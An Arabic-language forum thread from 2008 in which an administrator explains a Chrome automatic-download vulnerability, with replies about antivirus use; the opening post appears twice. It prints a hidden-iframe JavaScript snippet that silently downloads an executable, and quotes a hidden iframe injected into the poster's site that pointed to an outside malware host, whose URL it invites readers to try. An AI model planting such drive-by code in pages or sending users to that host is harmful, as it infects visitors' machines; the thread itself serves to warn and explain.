بحـث
المواضيع الأخيرة
أفضل 10 أعضاء في هذا المنتدى
| Orwa Abdelmonim |
| |||
| ahmed amin |
| |||
| d.sombola |
| |||
| Dr. Areeg magzoub |
| |||
| alfatih hamad |
| |||
| mahdi abdalazim |
| |||
| bob |
| |||
| Mankaka |
| |||
| مهند أزهري |
| |||
| القيصر |
|
ثغرة في متصفح google chrome بالتفصيل
3 مشترك
صفحة 1 من اصل 1
ثغرة في متصفح google chrome بالتفصيل
الناجي عبد الغفار الحسن 14/12/2008, 20:55
بسم الله
تعرضنا سابقاً في موضوع الفاتح بتاع القوقل كروم للثغرات الأمنية فيه ...
وإليكم التفصيل :
الثغرة نزلت في مواقع السيكيورتي في يوم 2008-09-03 .. طبعا ممكن يكون الهكر اكتشفوها من زمن وقاعدين يستغلوها في هجماتهم قبل ما ينزلوها في مواقع السيكيورتي..
الثغرة اسمها Automatic File Download Exploit
أي : استغلال التحميل التلقائي للملفات بحيث يستطيع الهاكر وضع الفيروس أو ملف التجسس في صفحة على الأنترنت وعند تصفح الصفحة الملغومة عبر القوقل كروم ينزل الملف الخبيث بدون استئذان على جهاز الزول وويقوم يتنفيذ الهجوم..
يعتمد على كود جافا سكربت التالي:
<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>
حيث يوضع عنوان الفايروس في محل :http://www.example.com/hello.exe
.....
ملاحظة: هذه الثغرة موجودة في internet explorer 6 لكن في سبعة ما عرفها والله ..
بس في الفايرفوكس 3 ما موجودة (عن تجربة طلعت عيني)..لذلك ننصح بشدة باستخدام الفايرفوكس..
بالمناسبة:
قبل فترة لمة فينا هكر معفن حقن لينا الكود دة في صفحات ال index ( أي الصفحة الرئيسية لكل مجلد في الموقع بما فيها صفحة الموقع الرئيسية وهذه الإندكسات هي التي تفتح أولاً عند طلب أي مجلد من الموقع ) في موقع سودان سوفت وموقع آخر ..بعد تعب وولادة نضفت الصفحات من الكود وعملت حماية للمجلدات بباسوورد
..
وهذا هو الكود الذي تم حقنه:
<iframe src="http://mmcounter.com/in.cgi?id115" width=1 height=1 style="visibility: hidden"></iframe>
ولا حظ عند نسخ مسار الفايروس الموضوع في الكود ووضعه في المتصفح تحصل على تحذير من قوقل بأن هذا الموقع موقع خطر على جهازك :
للتجربة: المسار هو : http://mmcounter.com/in.cgi?id115
ما تخافو الما بتجاوز تحذير قوقل ما بتجيهو عوجة..
لكن الكود دا عندما كان محقون في موقعي كان بنزل الفايروس طوالي لأن قوقل لم يسجل موقعي كموقع خطر ..
وقد تضررت شركة سودان سوفت كثيراً ن هذا الهجوم وتزعزعت ثقة العملاء وهبطت أسهمها ..
لمزيد المعلومات:
http://milw0rm.com/exploits/6355
الموقع : http://www.milw0rm.com هو معقل الهكر وموردهم الأساسي وفيه يتم وضع الثغرات المكتشفة أول بأول ويتباهى الهكر فيه بإكتشافاتهم (يعني سوق عكاظ بتاع الهكرز)..
ممكن لا حقاً أعمل ليكم صفحة فيها البيان بالعمل لمزيد من التوضيح..(إذا دايرين وضحو في الردود)
**************
بالمناسبة في ثغرات تانية نزلت لقوقل كروم وهي كالآتي:
Denial of Service Exploit - BOF Exploit - Crash PoC
الأولى ماعرفتها شنو ..لكن الأخيرة Denial of Service Exploit تعني تدمير المتصفح ( بالعربي يعني يعلق ..وترجمتها تعطيل الخدمة...وهي من الهجمات المشهورة...)
التانية : BOF Exploit هي ثغرة ال buffer over flow وتعني غمر المسجلات المحجوزة للبرنامج (والبرنامج هنا هو القوقل كروم) غمره بالبيانات حتى تطفح الذاكرة (يعني توسع :D :D نعتذر عن المصطلح لكن بقرب الفهم كتير) ولا يستطيع البرنامج أداء مهمته الأساسية حيث تتم السيطرة عليه من قبل الهكر ويستغل من قبل الهاكر في الدخول على الجهاز وتدميره..
بلغة الطب يعني زي السرطان حيث يتم تغيير في جينات الخلية(المتصفح قبل الهجوم) التي كانت جزء من الجسم لتصبح بصفاتها الجديدة ( الخلية بعد تغيير جيناتها لتصبح سرطانية = المتصفح بعد غمر السجلات المحجوزة له حيث يتم بعد غمر المسجلات وضع أكواد من قبل الهكر لتنفيذ الهجوم هذه الأكواد هي الجينات في الخلية السرطانية) تصبح عدو داخلي للجسم ..
ـــــــــــــتت
مع تحيات قسم الأمن الإلكتروني بسودان سوفت
تعرضنا سابقاً في موضوع الفاتح بتاع القوقل كروم للثغرات الأمنية فيه ...
وإليكم التفصيل :
الثغرة نزلت في مواقع السيكيورتي في يوم 2008-09-03 .. طبعا ممكن يكون الهكر اكتشفوها من زمن وقاعدين يستغلوها في هجماتهم قبل ما ينزلوها في مواقع السيكيورتي..
الثغرة اسمها Automatic File Download Exploit
أي : استغلال التحميل التلقائي للملفات بحيث يستطيع الهاكر وضع الفيروس أو ملف التجسس في صفحة على الأنترنت وعند تصفح الصفحة الملغومة عبر القوقل كروم ينزل الملف الخبيث بدون استئذان على جهاز الزول وويقوم يتنفيذ الهجوم..
يعتمد على كود جافا سكربت التالي:
<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>
حيث يوضع عنوان الفايروس في محل :http://www.example.com/hello.exe
.....
ملاحظة: هذه الثغرة موجودة في internet explorer 6 لكن في سبعة ما عرفها والله ..
بس في الفايرفوكس 3 ما موجودة (عن تجربة طلعت عيني)..لذلك ننصح بشدة باستخدام الفايرفوكس..
بالمناسبة:
قبل فترة لمة فينا هكر معفن حقن لينا الكود دة في صفحات ال index ( أي الصفحة الرئيسية لكل مجلد في الموقع بما فيها صفحة الموقع الرئيسية وهذه الإندكسات هي التي تفتح أولاً عند طلب أي مجلد من الموقع ) في موقع سودان سوفت وموقع آخر ..بعد تعب وولادة نضفت الصفحات من الكود وعملت حماية للمجلدات بباسوورد
..
وهذا هو الكود الذي تم حقنه:
<iframe src="http://mmcounter.com/in.cgi?id115" width=1 height=1 style="visibility: hidden"></iframe>
ولا حظ عند نسخ مسار الفايروس الموضوع في الكود ووضعه في المتصفح تحصل على تحذير من قوقل بأن هذا الموقع موقع خطر على جهازك :
للتجربة: المسار هو : http://mmcounter.com/in.cgi?id115
ما تخافو الما بتجاوز تحذير قوقل ما بتجيهو عوجة..
لكن الكود دا عندما كان محقون في موقعي كان بنزل الفايروس طوالي لأن قوقل لم يسجل موقعي كموقع خطر ..
وقد تضررت شركة سودان سوفت كثيراً ن هذا الهجوم وتزعزعت ثقة العملاء وهبطت أسهمها ..
لمزيد المعلومات:
http://milw0rm.com/exploits/6355
الموقع : http://www.milw0rm.com هو معقل الهكر وموردهم الأساسي وفيه يتم وضع الثغرات المكتشفة أول بأول ويتباهى الهكر فيه بإكتشافاتهم (يعني سوق عكاظ بتاع الهكرز)..
ممكن لا حقاً أعمل ليكم صفحة فيها البيان بالعمل لمزيد من التوضيح..(إذا دايرين وضحو في الردود)
**************
بالمناسبة في ثغرات تانية نزلت لقوقل كروم وهي كالآتي:
Denial of Service Exploit - BOF Exploit - Crash PoC
الأولى ماعرفتها شنو ..لكن الأخيرة Denial of Service Exploit تعني تدمير المتصفح ( بالعربي يعني يعلق ..وترجمتها تعطيل الخدمة...وهي من الهجمات المشهورة...)
التانية : BOF Exploit هي ثغرة ال buffer over flow وتعني غمر المسجلات المحجوزة للبرنامج (والبرنامج هنا هو القوقل كروم) غمره بالبيانات حتى تطفح الذاكرة (يعني توسع :D :D نعتذر عن المصطلح لكن بقرب الفهم كتير) ولا يستطيع البرنامج أداء مهمته الأساسية حيث تتم السيطرة عليه من قبل الهكر ويستغل من قبل الهاكر في الدخول على الجهاز وتدميره..
بلغة الطب يعني زي السرطان حيث يتم تغيير في جينات الخلية(المتصفح قبل الهجوم) التي كانت جزء من الجسم لتصبح بصفاتها الجديدة ( الخلية بعد تغيير جيناتها لتصبح سرطانية = المتصفح بعد غمر السجلات المحجوزة له حيث يتم بعد غمر المسجلات وضع أكواد من قبل الهكر لتنفيذ الهجوم هذه الأكواد هي الجينات في الخلية السرطانية) تصبح عدو داخلي للجسم ..
ـــــــــــــتت
مع تحيات قسم الأمن الإلكتروني بسودان سوفت
الناجي عبد الغفار الحسن- الادارة
- عدد الرسائل : 359
الموقع : www.computer.sd, www.pharmacy.sd
رقم الدفعه : الثامنة
نقاط : 5889
تاريخ التسجيل : 18/11/2008 -
رد: ثغرة في متصفح google chrome بالتفصيل
alfatih hamad 14/12/2008, 22:54
ان شغال بيهو 5 اشهر والحمد لله لم يصبني فايروس
اي زول لو عندي انتي فايروس قوي ومحدث ما في خوف عليهو
( ومن يتوكل على الله فهو حسبه)
اي زول لو عندي انتي فايروس قوي ومحدث ما في خوف عليهو
( ومن يتوكل على الله فهو حسبه)
alfatih hamad- الادارة
- عدد الرسائل : 787
رقم الدفعه : 9
نقاط : 5956
تاريخ التسجيل : 28/10/2008
رد: ثغرة في متصفح google chrome بالتفصيل
T2 و ت2 15/12/2008, 00:24
يبدو اننا بحاجة الي مترجمين يجيدون نرجمة العربية الي السيارة....
T2 و ت2- عدد الرسائل : 399
رقم الدفعه : 9
نقاط : 5755
تاريخ التسجيل : 28/11/2008
رد: ثغرة في متصفح google chrome بالتفصيل
الناجي عبد الغفار الحسن 15/12/2008, 14:43
كيف يعني يا طارق؟؟؟؟؟
يترجمو شنو؟؟؟؟
كان الكلام ما واضح حنعمل ليكم بيان بالعمل بالذات للفاتح اب لساناً طويل دة
يترجمو شنو؟؟؟؟
كان الكلام ما واضح حنعمل ليكم بيان بالعمل بالذات للفاتح اب لساناً طويل دة
الناجي عبد الغفار الحسن- الادارة
- عدد الرسائل : 359
الموقع : www.computer.sd, www.pharmacy.sd
رقم الدفعه : الثامنة
نقاط : 5889
تاريخ التسجيل : 18/11/2008 -
رد: ثغرة في متصفح google chrome بالتفصيل
الناجي عبد الغفار الحسن 15/12/2008, 14:51
شوف يالفاتح مافي انتي فايروس فيهو فايدة لأسباب كتيرة حنفرد ليها موضوع إن شاء الله..
وما يغرك إنو قبض ليك كم فايرس كدة..إنت عارف الما اتعرف عليها كم من الفيروسات..
هسي أنا شغال بدون أنتي فايرس لي كم سنة بعد ما كفرت بالأنتي فايروسات كلها..(عندي قصيدة في هذا الإطار : انقر هنا للإطلاع على القصيدة)....
تانياً يالفاتح : مافي نظام لا يمكن اختراقه وليس هناك نظام آمن تماماً...
ياخ : موقع الأمم المتحدة انضرب موقع الجزيرة انضرب موقع مايكروسوفت انضرب موقع العربية انضرب قبل أيام .. جهاز ستروك صاحب موقع milw0rm اخترق...
:x :x :x :x :x :x :x :x :x :twisted: :twisted: :twisted: :twisted: :twisted: :twisted:
وما يغرك إنو قبض ليك كم فايرس كدة..إنت عارف الما اتعرف عليها كم من الفيروسات..
هسي أنا شغال بدون أنتي فايرس لي كم سنة بعد ما كفرت بالأنتي فايروسات كلها..(عندي قصيدة في هذا الإطار : انقر هنا للإطلاع على القصيدة)....
تانياً يالفاتح : مافي نظام لا يمكن اختراقه وليس هناك نظام آمن تماماً...
ياخ : موقع الأمم المتحدة انضرب موقع الجزيرة انضرب موقع مايكروسوفت انضرب موقع العربية انضرب قبل أيام .. جهاز ستروك صاحب موقع milw0rm اخترق...
:x :x :x :x :x :x :x :x :x :twisted: :twisted: :twisted: :twisted: :twisted: :twisted:
الناجي عبد الغفار الحسن- الادارة
- عدد الرسائل : 359
الموقع : www.computer.sd, www.pharmacy.sd
رقم الدفعه : الثامنة
نقاط : 5889
تاريخ التسجيل : 18/11/2008 -
رد: ثغرة في متصفح google chrome بالتفصيل
alfatih hamad 17/12/2008, 02:08
اقول ليك حاجة ...
هو الواحد اساسا ينزل انتي فايروس لشنو؟
المواقع الذكرتها دي مواقع مهمة وفيها معلومات واغراض شخصية بالنسبة لناس تانيين
اما احنا الغلابة ديل ح يخترقو جهازنا لشنو ؟
اصلو ح يخش وما يلقى حاجة ويطلع وهو ندمان انو ضيع زمنو في الفاضي !!
ولا كيف؟
يا تيتو قلنا ليك حاجات زي دي كبيرة عليك !!
هو الواحد اساسا ينزل انتي فايروس لشنو؟
المواقع الذكرتها دي مواقع مهمة وفيها معلومات واغراض شخصية بالنسبة لناس تانيين
اما احنا الغلابة ديل ح يخترقو جهازنا لشنو ؟
اصلو ح يخش وما يلقى حاجة ويطلع وهو ندمان انو ضيع زمنو في الفاضي !!
ولا كيف؟
يا تيتو قلنا ليك حاجات زي دي كبيرة عليك !!
alfatih hamad- الادارة
- عدد الرسائل : 787
رقم الدفعه : 9
نقاط : 5956
تاريخ التسجيل : 28/10/2008
مواضيع مماثلةصفحة 1 من اصل 1
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى
» sudan index
» من أفضل الكتب التي قرأتها في حياتي
» برنامج للإعداد للبورد الامريكي في تخصص الاورام
» برنامج للإعداد للبورد الامريكي
» انك صيدلاااااني ...
» سلااااااااااااام
» BNF 61 . . download
» أخيراً..أول موقع وجدته لكتب الصيدلة فقط-ليس أي كتب أخرى- مجانا حمل أكتر من400 كتاب